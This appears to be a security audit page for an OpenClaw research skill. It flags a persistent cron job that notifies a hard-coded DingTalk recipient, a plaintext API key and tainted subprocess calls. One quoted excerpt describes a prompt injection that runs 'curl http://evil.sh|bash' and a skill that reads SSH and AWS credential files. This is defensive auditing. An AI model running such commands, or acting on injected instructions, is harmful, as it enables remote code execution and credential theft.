Back to skill

Security audit

desearch-skill

Security checks for vulnerabilities and agentic risk

Overview

This research skill is coherent overall, but needs Review because it creates a persistent OpenClaw cron notification to a hard-coded DingTalk recipient and stores a local API key plainly.

Review this skill carefully before installing. Only use it if you are comfortable sending research queries to Zeelin, storing the Zeelin API key locally, and changing or removing the hard-coded DingTalk cron notification behavior so task metadata is not sent to an unintended recipient.

Vulnerability Patterns
  • System PersistenceInstalls backdoors, hooks, services, or scheduled tasks that survive the run
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
  • Remote Payload Retrieval and ExecutionFetches external code whose behavior can change after review
Findings (3)

T06 · System Persistence

Error
Location
scripts/async_runner.py:41
Finding

Persistent Cron Job Sends Research Metadata to a Hard-Coded DingTalk Recipient

Content
View full analysis
Remediation
View remediation

T09 · Insecure Skill Coding Practices

Warning
Location
scripts/async_runner.py:238
Finding

Zeelin API Key Is Stored in Plaintext Without Restrictive File Permissions

Content
View full analysis
Remediation
View remediation

T09 · Insecure Skill Coding Practices

Warning
Location
scripts/check_zeelin_complete.py:51
Finding

Server-Controlled Report URL Is Downloaded Without Destination or Size Validation

Content
View full analysis
Remediation
View remediation
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Output HandlingUnvalidated Output Injection, Cross-Context Output, Unbounded Output
Findings (50)

Tainted flow: 'session_id' from requests.post (line 287, network input) → subprocess.Popen (code execution)

Critical
Category
Data Flow
Confidence
90% confidence
Finding

External input (network, user) flows to a code execution sink. This enables remote code execution or command injection.

Content

Scanner excerpt · scripts/async_runner.py (reported line 306)May include surrounding context.

python
# 启动后台监控 - 使用nohup确保持续运行
        script = os.path.abspath(__file__)
        import subprocess
        subprocess.Popen(
            [sys.executable, script, "--monitor", "-s", session_id, "-qid", str(question_id), "-q", args.query],
            stdout=open("/tmp/zeelin-monitor.log", "a"),
            stderr=open("/tmp/zeelin-monitor.log", "a"),

Tp4

High
Category
MCP Tool Poisoning
Confidence
95% confidence
Finding

The skill claims autonomous background actions and user-interaction safeguards, but the finding indicates those controls are absent while local config access still occurs. Missing the required pre-use questioning and omitting disclosure of local credential/config access weakens informed consent and can expose sensitive local data usage beyond what a user expects from a research helper.

Content

No source excerpt is available for this finding.

Tp4

High
Category
MCP Tool Poisoning
Confidence
98% confidence
Finding

The skill claims autonomous background actions and user-interaction safeguards, but the finding indicates those controls are absent while local config access still occurs. Missing the required pre-use questioning and omitting disclosure of local credential/config access weakens informed consent and can expose sensitive local data usage beyond what a user expects from a research helper.

Content

No source excerpt is available for this finding.

Tp4

High
Category
MCP Tool Poisoning
Confidence
97% confidence
Finding

The skill claims autonomous background actions and user-interaction safeguards, but the finding indicates those controls are absent while local config access still occurs. Missing the required pre-use questioning and omitting disclosure of local credential/config access weakens informed consent and can expose sensitive local data usage beyond what a user expects from a research helper.

Content

No source excerpt is available for this finding.

Unvalidated Output Injection

High
Category
Output Handling
Confidence
85% confidence
Finding

Model output is used without validation or sanitization. Unvalidated output injected into downstream contexts (SQL, shell, HTML) enables injection attacks and arbitrary code execution.

Content

Scanner excerpt · references/async-pattern.md (reported line 33)May include surrounding context.

md
task_id = f.read().strip()

# 3. 启动后台监控(非阻塞)
subprocess.Popen([
    "python3", "scripts/check_status.py",
    "--task-id", task_id,
    "--watch",

Missing User Warnings

High
Category
Not specified by scanner
Confidence
95% confidence
Finding

This section describes remote server login, log extraction, and service restart behavior via short natural-language commands without warning about authentication, change control, or rollback. In the context of an asynchronous agent skill, such framing is dangerous because it encourages direct production operations through a powerful automation layer, raising the risk of unauthorized access or accidental service disruption.

Content

No source excerpt is available for this finding.

Missing User Warnings

High
Category
Not specified by scanner
Confidence
93% confidence
Finding

The markdown describes automated generation of trading signals and execution of trading instructions without warnings about financial loss, compliance obligations, or irreversible effects. Because the skill is positioned as an execution-capable agent, presenting trading automation without guardrails could lead users to enable unsafe autonomous financial actions.

Content

No source excerpt is available for this finding.

Missing User Warnings

High
Category
Not specified by scanner
Confidence
95% confidence
Finding

The text describes voice-triggered control of physical devices such as ovens and air conditioning without warnings about physical safety, occupancy checks, or fail-safe requirements. In a real-world automation skill, unattended control of actuators can cause property damage, injury, or unsafe environmental conditions if triggered incorrectly or maliciously.

Content

No source excerpt is available for this finding.

Credential Access

High
Category
Privilege Escalation
Confidence
90% confidence
Finding

Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Content

Scanner excerpt · reports/zeelin_openclaw实际的需求有哪些_20260304_140400.md (reported line 198)May include surrounding context.

md
通报披露,截至2026年2月,已发现17个携带木马后门的技能包,累计被安装3.2万次,涉及我国IP约1.8万个[^103]。思科AI威胁研究主管曾指出,从安全角度看,OpenClaw“是一场噩梦”,因为它默认授予技能几乎等同于本地用户的系统级权限,而技能市场缺乏代码审计与签名验证[^63]。

已披露的CVE-2026-25253漏洞可致远程代码执行,CVSS评分9.8[^30]。在macOS 13环境安装“DevSkill”后,OpenClaw读取~/.ssh/config与~/.aws/credentials,根据用户一句指令自动生成可执行脚本,并调用/usr/bin/code打开VS Code调试;脚本内直接嵌入AWS Access Key ID与Secret,且被赋予0755权限。安全团队随后验证,因OpenClaw的“命令执行”技能未做沙箱隔离,攻击者可通过恶意prompt注入“curl http://evil.sh|bash”完成远程代码执行[^30]。

### 3. 隐性成本:显卡折旧、电费、VPN、心跳账单

External Script Fetching

High
Category
Supply Chain
Confidence
90% confidence
Finding

Remote code is downloaded and executed. This bypasses code review and could introduce malicious code.

Content

Scanner excerpt · reports/zeelin_openclaw实际的需求有哪些_20260304_140400.md (reported line 198)May include surrounding context.

md
通报披露,截至2026年2月,已发现17个携带木马后门的技能包,累计被安装3.2万次,涉及我国IP约1.8万个[^103]。思科AI威胁研究主管曾指出,从安全角度看,OpenClaw“是一场噩梦”,因为它默认授予技能几乎等同于本地用户的系统级权限,而技能市场缺乏代码审计与签名验证[^63]。

已披露的CVE-2026-25253漏洞可致远程代码执行,CVSS评分9.8[^30]。在macOS 13环境安装“DevSkill”后,OpenClaw读取~/.ssh/config与~/.aws/credentials,根据用户一句指令自动生成可执行脚本,并调用/usr/bin/code打开VS Code调试;脚本内直接嵌入AWS Access Key ID与Secret,且被赋予0755权限。安全团队随后验证,因OpenClaw的“命令执行”技能未做沙箱隔离,攻击者可通过恶意prompt注入“curl http://evil.sh|bash”完成远程代码执行[^30]。

### 3. 隐性成本:显卡折旧、电费、VPN、心跳账单

Context-Inappropriate Capability

High
Category
Not specified by scanner
Confidence
99% confidence
Finding

The skill sends proactive notifications to a hardcoded external DingTalk recipient unrelated to the invoking user. In context, this is especially dangerous because a research skill should not covertly exfiltrate task status or outputs to a fixed third party, making this behavior consistent with unauthorized data disclosure.

Content

No source excerpt is available for this finding.

Session Persistence

Medium
Category
Rogue Agent
Confidence
84% confidence
Finding

This duplicate finding points to the same behavior: persistent plaintext storage of an API key in ~/.openclaw/zeelin-config.json. In the context of a skill that performs background tasks and network operations, exposed credentials could let an attacker misuse the external API or impersonate the user.

Content

Scanner excerpt · INSTALL.md (reported line 28)May include surrounding context.

bash
# 创建配置文件
mkdir -p ~/.openclaw
cat > ~/.openclaw/zeelin-config.json << 'EOF'
{
  "api_key": "你的API_Key"

Session Persistence

Medium
Category
Rogue Agent
Confidence
84% confidence
Finding

This duplicate finding points to the same behavior: persistent plaintext storage of an API key in ~/.openclaw/zeelin-config.json. In the context of a skill that performs background tasks and network operations, exposed credentials could let an attacker misuse the external API or impersonate the user.

Content

Scanner excerpt · INSTALL.md (reported line 28)May include surrounding context.

bash
# 创建配置文件
mkdir -p ~/.openclaw
cat > ~/.openclaw/zeelin-config.json << 'EOF'
{
  "api_key": "你的API_Key"

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
88% confidence
Finding

The installation guide states that the skill will automatically send DingTalk notifications when tasks complete, but it does not clearly warn users that this causes outbound network communication and message delivery to a third-party service. Hidden or insufficiently disclosed egress is security-relevant because users may not expect task metadata, report status, or other contextual information to leave the local environment.

Content

No source excerpt is available for this finding.

Undeclared Tool Scope

Medium
Category
MCP Least Privilege
Confidence
92% confidence
Finding

The skill advertises operational commands that use environment access, file reads/writes, network calls, and shell execution, but it does not declare any tool scope or permission boundaries. This is dangerous because users and hosting platforms cannot accurately understand or constrain what the skill may access, increasing the risk of unintended secret exposure, filesystem modification, or arbitrary command execution.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
94% confidence
Finding

The skill description does not clearly warn that it performs automatic background actions and writes files, which undermines user awareness and consent. Hidden automation and persistence are risky because they can continue operating after the initial invocation and may leave artifacts or generate notifications unexpectedly.

Content

No source excerpt is available for this finding.

Context-Inappropriate Capability

Medium
Category
Not specified by scanner
Confidence
86% confidence
Finding

The documentation explicitly recommends spawning local subprocesses and background monitors as part of handling research jobs, which expands the skill from a scoped API integration into general-purpose process execution. In an agent context, this creates unnecessary command-execution and persistence capabilities that can be abused or can violate least-privilege expectations for a research-only skill.

Content

No source excerpt is available for this finding.

Context-Inappropriate Capability

Medium
Category
Not specified by scanner
Confidence
92% confidence
Finding

The webhook pattern sends task results to an arbitrary external URL, extending the skill's behavior from research execution to outbound data delivery. That creates a data exfiltration path if research results, prompts, or metadata are transmitted to untrusted destinations without explicit user approval and destination validation.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
90% confidence
Finding

The documentation presents external webhook delivery without warning that task contents and results may be transmitted to a third-party server. In a deep-research skill, outputs may contain sensitive user queries, collected source material, or derived analysis, so silent outbound transfer creates a meaningful privacy and compliance risk.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
92% confidence
Finding

This markdown file contains user-facing instructions only in Chinese, including the title and all setup steps. Under the policy, forcing a specific language without user opt-in is a natural-language policy violation unless the locale constraint is clearly documented and justified.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
93% confidence
Finding

The markdown presents autonomous actions such as form submission, account interaction, and workflow execution as successful examples without emphasizing authorization boundaries, user confirmation, or misuse risks. In a skill ecosystem that can trigger real actions asynchronously, this can normalize unsafe use and increase the chance that operators deploy high-impact automations without adequate safeguards.

Content

No source excerpt is available for this finding.

subprocess module call

Medium
Category
Dangerous Code Execution
Confidence
70% confidence
Finding

subprocess module calls execute external commands. Without careful input validation, this enables command injection.

Content

Scanner excerpt · scripts/async_runner.py (reported line 45)May include surrounding context.

python
"""创建定时任务"""
    try:
        # 先删除可能存在的旧任务
        subprocess.run(["openclaw", "cron", "rm", CRON_JOB_NAME], capture_output=True)
        # 创建新任务:每1分钟检查一次
        result = subprocess.run([
            "openclaw", "cron", "add",

Description-Behavior Mismatch

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

The implementation configures 1-minute polling and a hardcoded DingTalk target, diverging from the declared 2-minute notification behavior. Security-relevant mismatches between manifest and implementation reduce transparency and can hide more invasive behavior than users expect, especially when external notifications are involved.

Content

No source excerpt is available for this finding.

subprocess module call

Medium
Category
Dangerous Code Execution
Confidence
96% confidence
Finding

This code creates a recurring background cron task that proactively sends messages to a hardcoded DingTalk recipient every minute. In the context of a research skill, silently installing persistent notification behavior to an external destination exceeds expected functionality and can leak task metadata or completion events without user-specific authorization.

Content

Scanner excerpt · scripts/async_runner.py (reported line 47)May include surrounding context.

python
# 先删除可能存在的旧任务
        subprocess.run(["openclaw", "cron", "rm", CRON_JOB_NAME], capture_output=True)
        # 创建新任务:每1分钟检查一次
        result = subprocess.run([
            "openclaw", "cron", "add",
            "--name", CRON_JOB_NAME,
            "--every", "1m",

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

The code installs a background cron job that sends notifications externally without clear runtime disclosure or per-use consent. Hidden persistence and outbound messaging increase the chance of unintended data exposure and violate user expectations for a simple research task.

Content

No source excerpt is available for this finding.

Static analysis

No suspicious patterns detected.